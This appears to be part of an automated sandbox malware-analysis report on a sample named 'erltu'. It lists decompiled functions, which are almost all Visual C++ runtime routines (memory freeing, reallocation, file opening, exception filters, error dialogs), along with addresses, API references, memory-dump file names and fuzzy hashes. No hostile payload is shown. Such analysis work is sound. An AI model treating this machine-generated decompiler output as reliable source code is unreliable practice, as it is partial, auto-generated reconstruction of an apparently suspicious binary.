Opcode Fuzzy Hash: 53fedec632b34256b38741706f5063a25bcc4bbfd43fb6985045649a821e02b8
Instruction Fuzzy Hash: 0D01A2B1A04205AFDB169F18E845FADB7E4EB08350F05C4BFFD899B256E239C5408B94

Uniqueness

Uniqueness Score: -1.00%

Function 0101E5F0 Relevance: 3.0, APIs: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0101E5F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x102f160);
				E0101EFF0(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E0101EAD3(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E0101E410( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E0101E679(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E0101E690( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E0101EF9A())) = 0x16;
						E0101E9FE();
						goto L6;
					}
				}
				return E0101F035(_t16);
			}

0x0101e5f0
0x0101e5f2
0x0101e5f7
0x0101e5fe
0x0101e604
0x0101e637
0x0101e637
0x0101e60b
0x0101e60b
0x0101e610
0x0101e640
0x0101e646
0x0101e656
0x0101e65e
0x0101e660
0x0101e663
0x0101e66a
0x0101e66f
0x0101e612
0x0101e616
0x0101e61f
0x0101e624
0x0101e62c
0x0101e632
0x00000000
0x0101e632
0x0101e610
0x0101e63e

APIs

_memset.LIBCMT ref: 0101E61F
__lock_file.LIBCMT ref: 0101E640

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: dc9d0f373fbedb6b7b1dcba6a3412d7db724cb00978d7a9ec0d71aaae59279db
Instruction ID: c94b5cb886b47e2b1019451ca4be585979f4abd9fac3984fafe0427721c13e7e
Opcode Fuzzy Hash: dc9d0f373fbedb6b7b1dcba6a3412d7db724cb00978d7a9ec0d71aaae59279db
Instruction Fuzzy Hash: A301713180020AABCF53AF69CC008DF7FB1BF543A0F544959FCA856168D7398651DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0101E331 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0101E331(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E0101E346(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x0101e334
0x0101e336
0x0101e339
0x0101e33c
0x0101e345

APIs

__wfsopen.LIBCMT ref: 0101E33C

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: c754eeced186aca4b1fc6110e67cc2491e58eda63940272a11d14540d97f5a60
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: E4B0927244020CB7CE122E82EC02A893B199B50660F048060FF0C181A0A677AA60A68A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010214EC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E010214EC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x010214f1
0x01021501

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,0101E99F,?,?,?,00000000), ref: 010214F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 010214FA

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1b2e854b135272ecd7aff761834d3ba8507dbac2984dd56f417925cd91379503
Instruction ID: b7201e186c973dcef6e24e558c618860d748ea39ca7a16c06ac0a9bd9f061750
Opcode Fuzzy Hash: 1b2e854b135272ecd7aff761834d3ba8507dbac2984dd56f417925cd91379503
Instruction Fuzzy Hash: ADB0923114420CEBCB322F92E849B687F2CEB04652F108010F65E44455AB7B94108BA5

Uniqueness

Uniqueness Score: -1.00%

Function 010214BB Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010214BB(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x010214c8

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,01020037,0101FFEC), ref: 010214C1

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2ba9a75500caf053d3d0436a48d53cf656155271877ca4ecb0161e7358920e81
Instruction ID: 52a68cd00bdd70c0508b99c2f922a57960ccd8deae25c6ba0207a076ec42156b
Opcode Fuzzy Hash: 2ba9a75500caf053d3d0436a48d53cf656155271877ca4ecb0161e7358920e81
Instruction Fuzzy Hash: 6EA0113000020CAB8B222E82E8088A83F2CEA002A0B000020F80C00820AB2BA8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 007F03F8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction ID: 63ca8f4614eb95728ffcf57572ff2f8310fdcd0d07118baf71e6811b5deabec4
Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction Fuzzy Hash: 6D617175E002189BCF10DBA5D844BBEB7B5AF48710F148059E615E7392D7B89D11CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 007F061D Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction ID: 4214e1a896a085444b519aca3d325bc230647ef4f68174eb082402841d7786df
Opcode Fuzzy Hash: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction Fuzzy Hash: E3218E36A00218EFCB10DFA9C8849BDF7F5EF98354B14846AE542D3362E674DE10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007F0736 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction ID: bdf20942a85000dde02792aec173a63b9166db15aa26a9d4a71c6e6d4946910d
Opcode Fuzzy Hash: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction Fuzzy Hash: 06E01A3976064ADFCB04DBB8C985D59B3E4EB48368B144294F916C73E2EA78FD00DA60

Uniqueness

Uniqueness Score: -1.00%

Function 007F0772 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction ID: 7c1b5b42d5e49878f97d7521471e8d29991601f77edbca092ed7b55cab2c7d2d
Opcode Fuzzy Hash: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction Fuzzy Hash: 02E086363105148BDB20EA19C484963F3E9EBC83B071548A9EA46D3712C234FC008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 007F06F7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.280671670.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_erltu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 010258F2 Relevance: 19.6, APIs: 13, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E010258F2(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x1030e24; // 0x1032034
					if(_t56 != 0) {
						E01021919(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x1030e28; // 0x1032034
					if(_t57 != 0) {
						E01021919(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x1030e2c; // 0x1032034
					if(_t58 != 0) {
						E01021919(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x1030e30; // 0x1032034
					if(_t59 != 0) {
						E01021919(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x1030e34; // 0x1032034
					if(_t60 != 0) {
						E01021919(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x1030e38; // 0x1032034
					if(_t61 != 0) {
						E01021919(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x1030e3c; // 0x1032034
					if(_t62 != 0) {
						E01021919(_t22);
					}
					_t9 = _t54 + 0x38; // 0x8b55c35d
					_t63 =  *_t9 -  *0x1030e50; // 0x1032038
					if(_t63 != 0) {
						E01021919(_t23);
					}
					_t10 = _t54 + 0x3c; // 0x10ec83ec
					_t64 =  *_t10 -  *0x1030e54; // 0x1032038
					if(_t64 != 0) {
						E01021919(_t24);
					}
					_t11 = _t54 + 0x40; // 0x758b5653
					_t65 =  *_t11 -  *0x1030e58; // 0x1032038
					if(_t65 != 0) {
						E01021919(_t25);
					}
					_t12 = _t54 + 0x44; // 0x74f6850c
					_t66 =  *_t12 -  *0x1030e5c; // 0x1032038
					if(_t66 != 0) {
						E01021919(_t26);
					}
					_t13 = _t54 + 0x48; // 0x105d8b18
					_t67 =  *_t13 -  *0x1030e60; // 0x1032038
					if(_t67 != 0) {
						E01021919(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x1174db85
					_t15 =  *_t14;
					_t68 = _t15 -  *0x1030e64; // 0x1032038
					if(_t68 != 0) {
						return E01021919(_t15);
					}
				}
				return _t15;
			}

0x010258f6
0x010258fb
0x01025901
0x01025904
0x0102590a
0x0102590d
0x01025912
0x01025913
0x01025916
0x0102591c
0x0102591f
0x01025924
0x01025925
0x01025928
0x0102592e
0x01025931
0x01025936
0x01025937
0x0102593a
0x01025940
0x01025943
0x01025948
0x01025949
0x0102594c
0x01025952
0x01025955
0x0102595a
0x0102595b
0x0102595e
0x01025964
0x01025967
0x0102596c
0x0102596d
0x01025970
0x01025976
0x01025979
0x0102597e
0x0102597f
0x01025982
0x01025988
0x0102598b
0x01025990
0x01025991
0x01025994
0x0102599a
0x0102599d
0x010259a2
0x010259a3
0x010259a6
0x010259ac
0x010259af
0x010259b4
0x010259b5
0x010259b8
0x010259be
0x010259c1
0x010259c6
0x010259c7
0x010259ca
0x010259d0
0x010259d3
0x010259d8
0x010259d9
0x010259d9
0x010259dc
0x010259e2
0x00000000
0x010259ea
0x010259e2
0x010259ed

APIs

_free.LIBCMT ref: 0102590D

Part of subcall function 01021919: HeapFree.KERNEL32(00000000,00000000,?,01020343,00000000,?,01030000), ref: 0102192D
Part of subcall function 01021919: GetLastError.KERNEL32(00000000,?,01020343,00000000,?,01030000), ref: 0102193F

_free.LIBCMT ref: 0102591F
_free.LIBCMT ref: 01025931
_free.LIBCMT ref: 01025943
_free.LIBCMT ref: 01025955
_free.LIBCMT ref: 01025967
_free.LIBCMT ref: 01025979
_free.LIBCMT ref: 0102598B
_free.LIBCMT ref: 0102599D
_free.LIBCMT ref: 010259AF
_free.LIBCMT ref: 010259C1
_free.LIBCMT ref: 010259D3
_free.LIBCMT ref: 010259E5

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5ae1861f660b752d6dc700fecc386a534db8d3bf67584c47dd55df55fc4628e0
Instruction ID: 623085d70135ca17d357f8c5e8f3406d3695444acf357f65a6dccde733de881c
Opcode Fuzzy Hash: 5ae1861f660b752d6dc700fecc386a534db8d3bf67584c47dd55df55fc4628e0
Instruction Fuzzy Hash: 5C215E72315222BFC670EE2CF895C9A77EDAA153247640C49F1C9D7558C736F9C08B28

Uniqueness

Uniqueness Score: -1.00%

Function 01012D75 Relevance: 9.1, APIs: 6, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01012D75(void* __edx, intOrPtr* __esi) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				void* _t16;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t29;
				signed int _t32;
				void* _t36;
				void* _t37;

				_t29 = __edx;
				asm("cld");
				_t19 =  *__esi();
				_t12 =  *((intOrPtr*)(_t37 - 4));
				if(_t19 < _t12) {
					L12:
					_t13 = 0;
				} else {
					_t32 = _t19 - _t12;
					_t2 = _t32 + 4; // 0x4
					if(_t2 < 4) {
						goto L12;
					} else {
						_t36 = E01026175(_t12);
						_t3 = _t32 + 4; // 0x4
						_t15 = _t3;
						if(_t36 >= _t15) {
							L11:
							__imp__EncodePointer( *((intOrPtr*)(_t37 + 8)));
							_t9 = _t19 + 4; // 0x4
							 *_t19 = _t15;
							__imp__EncodePointer(_t9);
							 *0x10320ec = _t15;
							_t13 =  *((intOrPtr*)(_t37 + 8));
						} else {
							_t16 = 0x800;
							if(_t36 < 0x800) {
								_t16 = _t36;
							}
							_t21 =  *((intOrPtr*)(_t37 - 4));
							_t17 = _t16 + _t36;
							if(_t16 + _t36 < _t36) {
								L8:
								_t5 = _t36 + 0x10; // 0x10
								_t18 = _t5;
								if(_t5 < _t36) {
									goto L12;
								} else {
									_t15 = E010219E0(_t21, _t29, _t21, _t18);
									if(_t15 == 0) {
										goto L12;
									} else {
										goto L10;
									}
								}
							} else {
								_t15 = E010219E0(_t21, _t29, _t21, _t17);
								if(_t15 != 0) {
									L10:
									_t19 = _t15 + (_t32 >> 2) * 4;
									__imp__EncodePointer(_t15);
									 *0x10320f0 = _t15;
									goto L11;
								} else {
									goto L8;
								}
							}
						}
					}
				}
				return _t13;
			}

0x01012d75
0x01023e26
0x01023e29
0x01023e2b
0x01023e30
0x01023eb8
0x01023eb8
0x01023e36
0x01023e38
0x01023e3a
0x01023e40
0x00000000
0x01023e42
0x01023e48
0x01023e4a
0x01023e4a
0x01023e50
0x01023e99
0x01023e9c
0x01023ea2
0x01023ea5
0x01023ea8
0x01023eae
0x01023eb3
0x01023e52
0x01023e52
0x01023e59
0x01023e5b
0x01023e5b
0x01023e5d
0x01023e60
0x01023e64
0x01023e73
0x01023e73
0x01023e73
0x01023e78
0x00000000
0x01023e7a
0x01023e7c
0x01023e85
0x00000000
0x00000000
0x00000000
0x00000000
0x01023e85
0x01023e66
0x01023e68
0x01023e71
0x01023e87
0x01023e8b
0x01023e8e
0x01023e94
0x00000000
0x00000000
0x00000000
0x00000000
0x01023e71
0x01023e64
0x01023e50
0x01023e40
0x01023ec0

APIs

DecodePointer.KERNEL32(?,?,?,?,?,01023DE6,?,0102F3E0,0000000C,01023ECC,?,?,01020565,010210A4), ref: 01023E27
__realloc_crt.LIBCMT ref: 01023E68
__realloc_crt.LIBCMT ref: 01023E7C
EncodePointer.KERNEL32(00000000,?,?,?,?,?,01023DE6,?,0102F3E0,0000000C,01023ECC,?,?,01020565,010210A4), ref: 01023E8E
EncodePointer.KERNEL32(?,?,?,?,?,?,01023DE6,?,0102F3E0,0000000C,01023ECC,?,?,01020565,010210A4), ref: 01023E9C
EncodePointer.KERNEL32(00000000,?,?,?,?,?,01023DE6,?,0102F3E0,0000000C,01023ECC,?,?,01020565,010210A4), ref: 01023EA8

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: Pointer$Encode$__realloc_crt$Decode
String ID:
API String ID: 1914396112-0
Opcode ID: bb3525cc0aaadaeee7d2ad81cd452a9e2a27f2a1f21fce0dc39eff84b65a1ead
Instruction ID: 635cf7831ddca248cc72dd7accc039101c67f05dfa69e0bb8b88ea9b4215f0a6
Opcode Fuzzy Hash: bb3525cc0aaadaeee7d2ad81cd452a9e2a27f2a1f21fce0dc39eff84b65a1ead
Instruction Fuzzy Hash: 7A118D72600225DB9F21DF34D8C04EAF7DAF7083953140566E895CB281EF39ED4C8794

Uniqueness

Uniqueness Score: -1.00%

Function 010165DA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E010165DA(void* __eax, struct HINSTANCE__* __ebx, void* __ecx, void* __edx, void* __edi) {
				signed int _v4;
				intOrPtr _v12;
				short _t6;
				void* _t8;
				void* _t10;
				intOrPtr _t12;
				void* _t13;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t22;
				void* _t23;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t33;
				signed int _t35;
				void* _t39;
				void* _t40;

				_t29 = __edi;
				_t28 = __edx;
				_t22 = __ebx;
				_t6 = __eax + 1;
				 *_t6 =  *_t6 + _t6;
				 *0x1031762 = _t6;
				if(GetModuleFileNameW(__ebx, 0x103155a, ??) != 0) {
					L3:
					_t8 = E010241BF(0x103155a);
					_pop(_t25);
					if(_t8 + 1 <= 0x3c) {
						L5:
						_t10 = E0102426B(0x1031528, 0x314, L"\n\n");
						_t40 = _t39 + 0xc;
						if(_t10 != 0) {
							goto L10;
						} else {
							_t13 = E0102426B(0x1031528, 0x314, _t29);
							_t40 = _t40 + 0xc;
							_t48 = _t13;
							if(_t13 != 0) {
								goto L10;
							} else {
								E01024395(_t25, _t28, _t48, 0x1031528, L"Microsoft Visual C++ Runtime Library", 0x12010);
								_pop(_t23);
								_pop(_t30);
								_pop(_t33);
								return E01021557(_t23, _v4 ^ _t35, _t28, _t30, _t33);
							}
						}
					} else {
						_t25 = 0x10314e4 + E010241BF(0x103155a) * 2;
						_t20 = E010242D7(0x10314e4 + E010241BF(0x103155a) * 2, 0x2fb - (0x10314e4 + E010241BF(0x103155a) * 2 - 0x103155a >> 1), L"...", 3);
						_t40 = _t39 + 0x14;
						if(_t20 != 0) {
							goto L10;
						} else {
							goto L5;
						}
					}
				} else {
					_t21 = E01024163(0x103155a, 0x2fb, L"<program name unknown>");
					_t40 = _t39 + 0xc;
					if(_t21 != 0) {
						L10:
						_push(_t22);
						_push(_t22);
						_push(_t22);
						_push(_t22);
						_push(_t22);
						E0101EA0E(_t22, _t28);
						asm("int3");
						_push(_t35);
						_t12 = _v12;
						 *0x1031520 = _t12;
						return _t12;
					} else {
						goto L3;
					}
				}
			}

0x010165da
0x010165da
0x010165da
0x01020e60
0x01020e62
0x01020e6a
0x01020e7d
0x01020e9a
0x01020e9f
0x01020ea5
0x01020ea9
0x01020ee0
0x01020ef0
0x01020ef5
0x01020efa
0x00000000
0x01020f00
0x01020f07
0x01020f0c
0x01020f0f
0x01020f11
0x00000000
0x01020f13
0x01020f1e
0x01020f7f
0x01020f83
0x01020f86
0x01020f8f
0x01020f8f
0x01020f11
0x01020eab
0x01020ebc
0x01020ed0
0x01020ed5
0x01020eda
0x00000000
0x00000000
0x00000000
0x00000000
0x01020eda
0x01020e7f
0x01020e8a
0x01020e8f
0x01020e94
0x01020f90
0x01020f90
0x01020f91
0x01020f92
0x01020f93
0x01020f94
0x01020f95
0x01020f9a
0x01020f9b
0x01020f9e
0x01020fa1
0x01020fa7
0x00000000
0x00000000
0x00000000
0x01020e94

APIs

GetModuleFileNameW.KERNEL32(00000000,0103155A,00000104,00000000,00000000,00000000), ref: 01020E70
___crtMessageBoxW.LIBCMT ref: 01020F1E
__invoke_watson.LIBCMT ref: 01020F95

Strings

<program name unknown>, xrefs: 01020E7F
..., xrefs: 01020EB7
Microsoft Visual C++ Runtime Library, xrefs: 01020F18

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: FileMessageModuleName___crt__invoke_watson
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library
API String ID: 586428465-1705011763
Opcode ID: 84e5b433348d4d4f5f1930b9975c5d7f47173dc2899e6a45149376dee9d68e03
Instruction ID: 779fffb45f569e0aa4efab52c2e95f8eb5f29116c176295264c1e574ec25e4ef
Opcode Fuzzy Hash: 84e5b433348d4d4f5f1930b9975c5d7f47173dc2899e6a45149376dee9d68e03
Instruction Fuzzy Hash: 53116F71F80339AAC621623BAC02FEF375CAF7E610F080065FCCBDA18DF96182104151

Uniqueness

Uniqueness Score: -1.00%

Function 01025265 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E01025265(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x103120c, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x1032040 == _t7) {
									_t9 = E0101EF9A();
									 *_t9 = E0101EFAD(GetLastError());
									goto L17;
								} else {
									if(E01023EF5(_t7, _t31) == 0) {
										_t12 = E0101EF9A();
										 *_t12 = E0101EFAD(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E01023EF5(_t6, _t31);
						 *((intOrPtr*)(E0101EF9A())) = 0xc;
						goto L12;
					} else {
						E01021919(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E010251D3(__ebx, __edx, __edi, _a8);
				}
			}

0x0102526c
0x0102527a
0x0102527f
0x0102528e
0x010252c1
0x01025293
0x01025295
0x01025295
0x010252a2
0x010252a8
0x010252ac
0x0102530c
0x0102530c
0x010252ae
0x010252b4
0x010252f6
0x0102530a
0x00000000
0x010252b6
0x010252bf
0x010252de
0x010252f2
0x010252d8
0x010252d8
0x00000000
0x00000000
0x00000000
0x010252bf
0x010252b4
0x00000000
0x010252da
0x010252c7
0x010252d2
0x00000000
0x01025281
0x01025284
0x0102528a
0x0102528a
0x010252db
0x010252dd
0x0102526e
0x01025278
0x01025278

APIs

_malloc.LIBCMT ref: 01025271

Part of subcall function 010251D3: __FF_MSGBANNER.LIBCMT ref: 010251EA
Part of subcall function 010251D3: __NMSG_WRITE.LIBCMT ref: 010251F1
Part of subcall function 010251D3: RtlAllocateHeap.NTDLL(00D60000,00000000,00000001,00000000,00000000,00000000,?,010219AF,00000000,00000000,00000000,00000000,?,01021864,00000018,0102F2B8), ref: 01025216

_free.LIBCMT ref: 01025284

Memory Dump Source

